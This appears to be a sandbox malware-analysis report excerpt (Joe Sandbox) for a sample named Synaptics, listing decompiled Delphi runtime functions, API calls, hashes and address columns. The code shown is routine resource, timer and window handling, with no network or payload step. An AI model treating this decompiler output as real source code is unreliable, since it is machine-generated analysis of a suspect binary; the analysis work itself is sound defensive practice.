                                                                                                                                                                                                                            0x0041e1f6
                                                                                                                                                                                                                            0x0041e201

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00400000,?,?), ref: 0041E1AF
                                                                                                                                                                                                                            • LoadResource.KERNEL32(00400000,0041E23C,00419048,00400000,00000001,00000000,?,0041E108,?,00000000,?,00000000,?,004767C5,0000000A,KBHKS), ref: 0041E1C9
                                                                                                                                                                                                                            • SizeofResource.KERNEL32(00400000,0041E23C,00400000,0041E23C,00419048,00400000,00000001,00000000,?,0041E108,?,00000000,?,00000000,?,004767C5), ref: 0041E1E3
                                                                                                                                                                                                                            • LockResource.KERNEL32(0041DD60,00000000,00400000,0041E23C,00400000,0041E23C,00419048,00400000,00000001,00000000,?,0041E108,?,00000000,?,00000000), ref: 0041E1ED
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3473537107-0
                                                                                                                                                                                                                            • Opcode ID: 9422232bda4f755a2221c3238b95ec70872abee181a7fbf85ff6cd90fcdaa231
                                                                                                                                                                                                                            • Instruction ID: 0493972d3240682b7dd301822f78e45fd4f377a97d2dc7c1e7558ac95a832863
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9422232bda4f755a2221c3238b95ec70872abee181a7fbf85ff6cd90fcdaa231
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ECF04BB6A042047F9704EE5AAC81DAB77DCEE88364320006EFD08DB342DA38ED4143B9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0047847C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                            			E0047847C(intOrPtr* __eax, void* __ebx, intOrPtr* __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0, signed int _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _v20;
				signed int* _v24;
				signed int* _v28;
				signed int _v32;
				signed int* _v36;
				intOrPtr _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v52;
				char _v84;
				signed int _v1620;
				signed int _t142;
				intOrPtr _t143;
				intOrPtr* _t144;
				intOrPtr _t147;
				signed char _t157;
				signed char _t158;
				signed int* _t165;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t224;
				intOrPtr _t225;
				intOrPtr _t226;
				intOrPtr _t227;
				signed int _t256;
				intOrPtr* _t258;
				void* _t260;
				void* _t261;
				intOrPtr _t262;
				void* _t276;

				_t276 = __fp0;
				_t260 = _t261;
				_t262 = _t261 + 0xfffff9b0;
				_v12 = __ecx;
				_t258 = __edx;
				_v8 = __eax;
				_t224 =  *0x417dc0; // 0x417dc4
				E004053AC( &_v84, _t224);
				_push(_t260);
				_push(0x4787af);
				_push( *[fs:eax]);
				 *[fs:eax] = _t262;
				_v20 = 0;
				_t211 = 0;
				_push(_t260);
				_push(0x47878c);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t262;
				_t256 =  *(__edx + 1) & 0x000000ff;
				if(_t256 > 0x40) {
					_t211 =  *0x49d980; // 0x477e3c
					E0040D200(_t211, 1);
					E00404378();
				}
				if(_t256 == 0) {
					L25:
					_v52 =  &_v1620;
					_v48 = _v12 + 4;
					_v44 = _t256;
					_v40 = 0;
					_t225 =  *_v12;
					_t142 =  *_t258;
					if(0 != 4) {
						__eflags = 0 - 1;
						if(0 == 1) {
							__eflags = _t256;
							if(__eflags == 0) {
								__eflags = _a4;
								if(__eflags != 0) {
									_t142 = 3;
								}
							}
						}
					} else {
						if((_v1620 & 0x00000fff) == 9) {
							_t142 = 8;
						}
						 *_v12 = 0xfffffffd;
						_v48 = _v48 - 4;
						_v40 = _v40 + 1;
					}
					_push(0);
					_push( &_v84);
					_push(_a4);
					_push( &_v52);
					_push(_t142);
					_push(0);
					_t143 =  *0x49d770; // 0x49b500
					_push(_t143);
					_push(_t225);
					_t144 = _v8;
					_push(_t144);
					if( *((intOrPtr*)( *_t144 + 0x18))() != 0) {
						E00478A5C();
					}
					_t207 = _v20;
					if(_t207 == 0) {
						L39:
						_t147 = 0;
						_pop(_t226);
						 *[fs:eax] = _t226;
						_push(E00478793);
						_t208 = _v20;
						if(_t208 == 0) {
							L41:
							return _t147;
						} else {
							goto L40;
						}
						do {
							L40:
							_t208 = _t208 - 1;
							_t147 =  *((intOrPtr*)(_t260 + _t208 * 8 - 0x250));
							_push(_t147);
							L00417E14();
						} while (_t208 != 0);
						goto L41;
					} else {
						do {
							_t207 = _t207 - 1;
							_t148 = _t260 + _t207 * 8 - 0x250;
							_t227 =  *((intOrPtr*)(_t260 + _t207 * 8 - 0x250 + 4));
							_t272 = _t227;
							if(_t227 != 0) {
								E00405950( *_t148,  *_t148, _t227, _t272);
							}
						} while (_t207 != 0);
						goto L39;
					}
				} else {
					_v24 = _a8;
					_v28 = _t260 + (_t256 + _t256) * 8 - 0x650;
					_t209 = 0;
					do {
						_v28 = _v28 - 0x10;
						_t157 =  *((intOrPtr*)(_t258 + _t209 + 3));
						_v16 = _t157 & 0x7f;
						_t158 = _t157 & 0x00000080;
						if(_v16 != 0xa) {
							__eflags = _v16 - 0x48;
							if(_v16 != 0x48) {
								__eflags = _t158;
								if(_t158 == 0) {
									__eflags = _v16 - 0xc;
									if(_v16 != 0xc) {
										 *_v28 = _v16;
										_v28[2] =  *_v24;
										__eflags = _v16 - 5;
										if(_v16 >= 5) {
											__eflags = _v16 - 7;
											if(_v16 <= 7) {
												_t93 =  &_v24;
												 *_t93 =  &(_v24[1]);
												__eflags =  *_t93;
												_v28[3] =  *_v24;
											}
										}
									} else {
										__eflags =  *_v24 - 0x100;
										if( *_v24 != 0x100) {
											_t165 = _v24;
											 *_v28 =  *_t165;
											_v28[1] = _t165[1];
											_t211 = _v28;
											_v28[2] = _t165[2];
											_v28[3] = _t165[3];
											_v24 =  &(_v24[3]);
										} else {
											_v36 = _t260 + _v20 * 8 - 0x250;
											 *_v36 = E00405974(_v24[2], _t211);
											_v36[1] = 0;
											 *_v28 = 8;
											_v28[2] =  *_v36;
											_v20 = _v20 + 1;
										}
									}
									goto L23;
								}
								__eflags = _v16 - 0xc;
								if(_v16 == 0xc) {
									__eflags =  *( *_v24) - 0x100;
									if( *( *_v24) == 0x100) {
										_t211 = 8;
										E00411330( *_v24, 8,  *_v24, _t256, _t276);
									}
								}
								 *_v28 = _v16 | 0x00004000;
								_v28[2] =  *_v24;
								goto L23;
							} else {
								_v32 = _t260 + _v20 * 8 - 0x250;
								__eflags = _t158;
								if(_t158 == 0) {
									 *_v32 = E00405974( *_v24, _t211);
									__eflags = 0;
									 *(_v32 + 4) = 0;
									 *_v28 = 8;
									_v28[2] =  *_v32;
								} else {
									 *_v32 = E00405974( *( *_v24), _t211);
									 *(_v32 + 4) =  *_v24;
									 *_v28 = 0x4008;
									_v28[2] = _v32;
								}
								_v20 = _v20 + 1;
								L23:
								_t98 =  &_v24;
								 *_t98 =  &(_v24[1]);
								__eflags =  *_t98;
								goto L24;
							}
						} else {
							 *_v28 = 0xa;
							_v28[2] = 0x80020004;
						}
						L24:
						_t209 = _t209 + 1;
					} while (_t256 != _t209);
					goto L25;
				}
			}





































                                                                                                                                                                                                                            0x0047847c
                                                                                                                                                                                                                            0x0047847d
                                                                                                                                                                                                                            0x0047847f
                                                                                                                                                                                                                            0x00478488
                                                                                                                                                                                                                            0x0047848b
                                                                                                                                                                                                                            0x0047848d
                                                                                                                                                                                                                            0x00478493
                                                                                                                                                                                                                            0x00478499
                                                                                                                                                                                                                            0x004784a0
                                                                                                                                                                                                                            0x004784a1
                                                                                                                                                                                                                            0x004784a6
                                                                                                                                                                                                                            0x004784a9
                                                                                                                                                                                                                            0x004784ae
                                                                                                                                                                                                                            0x004784b1
                                                                                                                                                                                                                            0x004784b3
                                                                                                                                                                                                                            0x004784b4
                                                                                                                                                                                                                            0x004784b9
                                                                                                                                                                                                                            0x004784bc
                                                                                                                                                                                                                            0x004784bf
                                                                                                                                                                                                                            0x004784c6
                                                                                                                                                                                                                            0x004784c8
                                                                                                                                                                                                                            0x004784d5
                                                                                                                                                                                                                            0x004784da
                                                                                                                                                                                                                            0x004784da
                                                                                                                                                                                                                            0x004784e1
                                                                                                                                                                                                                            0x004786aa
                                                                                                                                                                                                                            0x004786b0
                                                                                                                                                                                                                            0x004786b9
                                                                                                                                                                                                                            0x004786bc
                                                                                                                                                                                                                            0x004786c4
                                                                                                                                                                                                                            0x004786ca
                                                                                                                                                                                                                            0x004786ce
                                                                                                                                                                                                                            0x004786d3
                                                                                                                                                                                                                            0x004786fd
                                                                                                                                                                                                                            0x00478700
                                                                                                                                                                                                                            0x00478702
                                                                                                                                                                                                                            0x00478704
                                                                                                                                                                                                                            0x00478706
                                                                                                                                                                                                                            0x0047870a
                                                                                                                                                                                                                            0x0047870c
                                                                                                                                                                                                                            0x0047870c
                                                                                                                                                                                                                            0x0047870a
                                                                                                                                                                                                                            0x00478704
                                                                                                                                                                                                                            0x004786d5
                                                                                                                                                                                                                            0x004786e4
                                                                                                                                                                                                                            0x004786e6
                                                                                                                                                                                                                            0x004786e6
                                                                                                                                                                                                                            0x004786ee
                                                                                                                                                                                                                            0x004786f4
                                                                                                                                                                                                                            0x004786f8
                                                                                                                                                                                                                            0x004786f8
                                                                                                                                                                                                                            0x00478711
                                                                                                                                                                                                                            0x00478716
                                                                                                                                                                                                                            0x0047871a
                                                                                                                                                                                                                            0x0047871e
                                                                                                                                                                                                                            0x0047871f
                                                                                                                                                                                                                            0x00478720
                                                                                                                                                                                                                            0x00478722
                                                                                                                                                                                                                            0x00478727
                                                                                                                                                                                                                            0x00478728
                                                                                                                                                                                                                            0x00478729
                                                                                                                                                                                                                            0x0047872c
                                                                                                                                                                                                                            0x00478734
                                                                                                                                                                                                                            0x00478739
                                                                                                                                                                                                                            0x00478739
                                                                                                                                                                                                                            0x0047873e
                                                                                                                                                                                                                            0x00478743
                                                                                                                                                                                                                            0x00478765
                                                                                                                                                                                                                            0x00478765
                                                                                                                                                                                                                            0x00478767
                                                                                                                                                                                                                            0x0047876a
                                                                                                                                                                                                                            0x0047876d
                                                                                                                                                                                                                            0x00478772
                                                                                                                                                                                                                            0x00478777
                                                                                                                                                                                                                            0x0047878b
                                                                                                                                                                                                                            0x0047878b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00478779
                                                                                                                                                                                                                            0x00478779
                                                                                                                                                                                                                            0x00478779
                                                                                                                                                                                                                            0x0047877a
                                                                                                                                                                                                                            0x00478781
                                                                                                                                                                                                                            0x00478782
                                                                                                                                                                                                                            0x00478787
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00478745
                                                                                                                                                                                                                            0x00478745
                                                                                                                                                                                                                            0x00478745
                                                                                                                                                                                                                            0x00478746
                                                                                                                                                                                                                            0x0047874d
                                                                                                                                                                                                                            0x00478750
                                                                                                                                                                                                                            0x00478752
                                                                                                                                                                                                                            0x0047875c
                                                                                                                                                                                                                            0x0047875c
                                                                                                                                                                                                                            0x00478761
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00478745
                                                                                                                                                                                                                            0x004784e7
                                                                                                                                                                                                                            0x004784ea
                                                                                                                                                                                                                            0x004784f8
                                                                                                                                                                                                                            0x004784fb
                                                                                                                                                                                                                            0x004784fd
                                                                                                                                                                                                                            0x004784fd
                                                                                                                                                                                                                            0x00478501
                                                                                                                                                                                                                            0x00478510
                                                                                                                                                                                                                            0x00478513
                                                                                                                                                                                                                            0x00478519
                                                                                                                                                                                                                            0x00478533
                                                                                                                                                                                                                            0x00478537
                                                                                                                                                                                                                            0x004785ad
                                                                                                                                                                                                                            0x004785af
                                                                                                                                                                                                                            0x004785f6
                                                                                                                                                                                                                            0x004785fa
                                                                                                                                                                                                                            0x00478675
                                                                                                                                                                                                                            0x0047867f
                                                                                                                                                                                                                            0x00478682
                                                                                                                                                                                                                            0x00478686
                                                                                                                                                                                                                            0x00478688
                                                                                                                                                                                                                            0x0047868c
                                                                                                                                                                                                                            0x0047868e
                                                                                                                                                                                                                            0x0047868e
                                                                                                                                                                                                                            0x0047868e
                                                                                                                                                                                                                            0x0047869a
                                                                                                                                                                                                                            0x0047869a
                                                                                                                                                                                                                            0x0047868c
                                                                                                                                                                                                                            0x004785fc
                                                                                                                                                                                                                            0x004785ff
                                                                                                                                                                                                                            0x00478604
                                                                                                                                                                                                                            0x00478644
                                                                                                                                                                                                                            0x0047864c
                                                                                                                                                                                                                            0x00478654
                                                                                                                                                                                                                            0x0047865a
                                                                                                                                                                                                                            0x0047865d
                                                                                                                                                                                                                            0x00478666
                                                                                                                                                                                                                            0x00478669
                                                                                                                                                                                                                            0x00478606
                                                                                                                                                                                                                            0x00478610
                                                                                                                                                                                                                            0x00478621
                                                                                                                                                                                                                            0x00478628
                                                                                                                                                                                                                            0x0047862e
                                                                                                                                                                                                                            0x0047863c
                                                                                                                                                                                                                            0x0047863f
                                                                                                                                                                                                                            0x0047863f
                                                                                                                                                                                                                            0x00478604
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004785fa
                                                                                                                                                                                                                            0x004785b1
                                                                                                                                                                                                                            0x004785b5
                                                                                                                                                                                                                            0x004785bc
                                                                                                                                                                                                                            0x004785c1
                                                                                                                                                                                                                            0x004785cf
                                                                                                                                                                                                                            0x004785d4
                                                                                                                                                                                                                            0x004785d4
                                                                                                                                                                                                                            0x004785c1
                                                                                                                                                                                                                            0x004785e4
                                                                                                                                                                                                                            0x004785ee
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00478539
                                                                                                                                                                                                                            0x00478543
                                                                                                                                                                                                                            0x00478546
                                                                                                                                                                                                                            0x00478548
                                                                                                                                                                                                                            0x00478587
                                                                                                                                                                                                                            0x0047858c
                                                                                                                                                                                                                            0x0047858e
                                                                                                                                                                                                                            0x00478594
                                                                                                                                                                                                                            0x004785a2
                                                                                                                                                                                                                            0x0047854a
                                                                                                                                                                                                                            0x00478559
                                                                                                                                                                                                                            0x00478563
                                                                                                                                                                                                                            0x00478569
                                                                                                                                                                                                                            0x00478575
                                                                                                                                                                                                                            0x00478575
                                                                                                                                                                                                                            0x004785a5
                                                                                                                                                                                                                            0x0047869d
                                                                                                                                                                                                                            0x0047869d
                                                                                                                                                                                                                            0x0047869d
                                                                                                                                                                                                                            0x0047869d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0047869d
                                                                                                                                                                                                                            0x0047851b
                                                                                                                                                                                                                            0x0047851e
                                                                                                                                                                                                                            0x00478527
                                                                                                                                                                                                                            0x00478527
                                                                                                                                                                                                                            0x004786a1
                                                                                                                                                                                                                            0x004786a1
                                                                                                                                                                                                                            0x004786a2
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004784fd

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00478782
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeString
                                                                                                                                                                                                                            • String ID: <~G$H
                                                                                                                                                                                                                            • API String ID: 3341692771-3576284788
                                                                                                                                                                                                                            • Opcode ID: abb6cc486b40284b4fe571549fcb5a3b13e9f6fa694418c3db2e4b804864b1a7
                                                                                                                                                                                                                            • Instruction ID: b8f1c08bed6d2714fac9d526e07dd471d665f945914cf58d975e5e29605529f8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: abb6cc486b40284b4fe571549fcb5a3b13e9f6fa694418c3db2e4b804864b1a7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E7B1F8B4A006099FDB14CF99C884AAEB7F1FF49314F20C56AE909AB351D738AD41CF64
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00402188 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00401A9C: RtlInitializeCriticalSection.KERNEL32(0049E5CC,00000000,',?,?,00402336,0049E60C,00000000,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AB2
                                                                                                                                                                                                                              • Part of subcall function 00401A9C: RtlEnterCriticalSection.KERNEL32(0049E5CC,0049E5CC,00000000,',?,?,00402336,0049E60C,00000000,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AC5
                                                                                                                                                                                                                              • Part of subcall function 00401A9C: LocalAlloc.KERNEL32(00000000,00000FF8,0049E5CC,00000000,',?,?,00402336,0049E60C,00000000,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AEF
                                                                                                                                                                                                                              • Part of subcall function 00401A9C: RtlLeaveCriticalSection.KERNEL32(0049E5CC,00401B59,00000000,',?,?,00402336,0049E60C,00000000,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401B4C
                                                                                                                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049E5CC,00000000,7 ), ref: 004021D3
                                                                                                                                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049E5CC,0040230B), ref: 004022FE
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                                                                                                                                            • String ID: 7
                                                                                                                                                                                                                            • API String ID: 2227675388-1331172448
                                                                                                                                                                                                                            • Opcode ID: d57fdd7a51c297de22ae7a43f37e9dc48cc1f2cd16773fd01e790cee451199b4
                                                                                                                                                                                                                            • Instruction ID: 4af8bea66c2055acf7768281f877aa53f35be4b0bc747d0b7dec25e4a478ddf4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d57fdd7a51c297de22ae7a43f37e9dc48cc1f2cd16773fd01e790cee451199b4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8441E2B1A04200DFD715CFAADE9562977E0FB68328B6542BFD401E77E1E2799C41CB08
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0042F680 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47timeCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 60%
                                                                                                                                                                                                                            			E0042F680(void* __eax, void* __ebx, void* __ecx, void* __esi) {
				char _v8;
				int _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t28;
				int _t32;
				intOrPtr _t35;

				_push(0);
				_t23 = __eax;
				_push(_t35);
				_push(0x42f6ff);
				_push( *[fs:eax]);
				 *[fs:eax] = _t35;
				KillTimer( *(__eax + 0x34), 1);
				_t32 =  *(_t23 + 0x30);
				if(_t32 != 0 &&  *((char*)(_t23 + 0x40)) != 0 &&  *((short*)(_t23 + 0x3a)) != 0) {
					_t17 = SetTimer( *(_t23 + 0x34), 1, _t32, 0); // executed
					if(_t17 == 0) {
						_t18 =  *0x49de08; // 0x422f68
						E00406A70(_t18,  &_v8);
						E0040D144(_v8, 1);
						E00404378();
					}
				}
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E0042F706);
				return E004049C0( &_v8);
			}










                                                                                                                                                                                                                            0x0042f683
                                                                                                                                                                                                                            0x0042f687
                                                                                                                                                                                                                            0x0042f68b
                                                                                                                                                                                                                            0x0042f68c
                                                                                                                                                                                                                            0x0042f691
                                                                                                                                                                                                                            0x0042f694
                                                                                                                                                                                                                            0x0042f69d
                                                                                                                                                                                                                            0x0042f6a2
                                                                                                                                                                                                                            0x0042f6a7
                                                                                                                                                                                                                            0x0042f6bf
                                                                                                                                                                                                                            0x0042f6c6
                                                                                                                                                                                                                            0x0042f6cb
                                                                                                                                                                                                                            0x0042f6d0
                                                                                                                                                                                                                            0x0042f6df
                                                                                                                                                                                                                            0x0042f6e4
                                                                                                                                                                                                                            0x0042f6e4
                                                                                                                                                                                                                            0x0042f6c6
                                                                                                                                                                                                                            0x0042f6eb
                                                                                                                                                                                                                            0x0042f6ee
                                                                                                                                                                                                                            0x0042f6f1
                                                                                                                                                                                                                            0x0042f6fe

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • KillTimer.USER32(?,00000001,00000000,0042F6FF,?,?,?,00000000,?,0042F719,004982F9,00000000,00000001,?,0049A117,00000000), ref: 0042F69D
                                                                                                                                                                                                                            • SetTimer.USER32(?,00000001,?,00000000), ref: 0042F6BF
                                                                                                                                                                                                                              • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Timer$KillLoadString
                                                                                                                                                                                                                            • String ID: h/B
                                                                                                                                                                                                                            • API String ID: 1423459280-860576603
                                                                                                                                                                                                                            • Opcode ID: 1e7f4a3e1a81165d3749bce0843d0aab77b0c367e19ef7a19d8ea95de236c58b
                                                                                                                                                                                                                            • Instruction ID: c638335ebb45f94185b8bc64c2a04c90921daa6f7a9a6c3e75923d264c20285e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e7f4a3e1a81165d3749bce0843d0aab77b0c367e19ef7a19d8ea95de236c58b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C601B571B04210ABDB10EB61DC92F5A37BCDB45708FD1007AFD00AB2D2D7B9AC44C658
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00407A8C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00407A8C(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
				CHAR* _v8;
				void* _t13;
				struct HWND__* _t24;
				CHAR* _t29;
				long _t32;

				_v8 = _t29;
				_t32 = __eax;
				_t13 = E00402C0C();
				_t24 = CreateWindowExA(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00402BFC(_t13);
				return _t24;
			}








                                                                                                                                                                                                                            0x00407a93
                                                                                                                                                                                                                            0x00407a98
                                                                                                                                                                                                                            0x00407a9a
                                                                                                                                                                                                                            0x00407acb
                                                                                                                                                                                                                            0x00407ad4
                                                                                                                                                                                                                            0x00407ae0

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateWindow
                                                                                                                                                                                                                            • String ID: TPUtilWindow$x,B
                                                                                                                                                                                                                            • API String ID: 716092398-1057714546
                                                                                                                                                                                                                            • Opcode ID: 6f03bbe19ce8bec98a003051f3de9d9a43124493f49fa58d3969b4d3575b5c8e
                                                                                                                                                                                                                            • Instruction ID: 8ac853332085b9bd21b4b606e16f655482de0c328e5100a7f3fe009a2cef9f92
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f03bbe19ce8bec98a003051f3de9d9a43124493f49fa58d3969b4d3575b5c8e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EDF092B2704158BF9B80DE9DDD85EDB77ECEB4C264B05416AFA0CE3241D674ED108BA4
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0042C5E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                                            			E0042C5E4(int _a4) {
				void* __ebx;
				void* __ebp;
				signed int _t2;
				signed int _t3;
				void* _t7;
				int _t8;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t18;

				_t8 = _a4;
				if( *0x49e928 == 0) {
					 *0x49e900 = E0042C4FC(0, _t8,  *0x49e900, _t17, _t18);
					_t7 =  *0x49e900(_t8); // executed
					return _t7;
				}
				_t3 = _t2 | 0xffffffff;
				_t12 = _t8 + 0xffffffb4 - 2;
				__eflags = _t12;
				if(__eflags < 0) {
					_t3 = 0;
				} else {
					if(__eflags == 0) {
						_t8 = 0;
					} else {
						_t13 = _t12 - 1;
						__eflags = _t13;
						if(_t13 == 0) {
							_t8 = 1;
						} else {
							__eflags = _t13 - 0xffffffffffffffff;
							if(_t13 - 0xffffffffffffffff < 0) {
								_t3 = 1;
							}
						}
					}
				}
				__eflags = _t3 - 0xffffffff;
				if(_t3 != 0xffffffff) {
					return _t3;
				} else {
					return GetSystemMetrics(_t8);
				}
			}













                                                                                                                                                                                                                            0x0042c5e8
                                                                                                                                                                                                                            0x0042c5f2
                                                                                                                                                                                                                            0x0042c606
                                                                                                                                                                                                                            0x0042c60c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042c60c
                                                                                                                                                                                                                            0x0042c614
                                                                                                                                                                                                                            0x0042c61c
                                                                                                                                                                                                                            0x0042c61c
                                                                                                                                                                                                                            0x0042c61f
                                                                                                                                                                                                                            0x0042c633
                                                                                                                                                                                                                            0x0042c621
                                                                                                                                                                                                                            0x0042c621
                                                                                                                                                                                                                            0x0042c637
                                                                                                                                                                                                                            0x0042c623
                                                                                                                                                                                                                            0x0042c623
                                                                                                                                                                                                                            0x0042c623
